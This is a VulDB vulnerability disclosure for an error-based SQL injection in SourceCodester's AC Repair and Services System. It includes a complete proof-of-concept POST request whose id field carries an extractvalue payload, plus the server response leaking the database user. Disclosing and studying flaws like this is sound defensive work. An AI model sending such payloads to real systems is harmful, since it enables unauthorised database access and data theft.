Submit #182098: SourceCodester AC Repair and Services System sql injectioninfo

TitleSourceCodester AC Repair and Services System sql injection
DescriptionI have discovered a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html) This affect the file /classes/Master.php?f=save_inquiry: POST /php-acrss/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278 Content-Length: 913 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="fullname" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="email" [email protected] -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="contact" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="address" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="services[]" 1 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="status" 0 -----------------------------2854294418240524322736048278-- And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `fullname`='111' , `email`='[email protected]' , `contact`='111' , `address`='111' , `services`='' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}". This proves that there is an error injection vulnerability here The vulnerability exists because they all used the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without sufficient filtering on the controllable parameter id. This lack of filtering makes it possible for SQL injection attacks to occur. My suggestion for fixing this issue is to protect the id parameter from malicious exploitation by using mysqli_real_escape_string().
Source⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User
 NNanfeng (UID 27153)
Submission07/13/2023 11:40 (3 years ago)
Moderation07/13/2023 11:54 (14 minutes later)
StatusAccepted
VulDB entry234015 [SourceCodester AC Repair and Services System 1.0 Master.php?f=save_inquiry ID sql injection]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!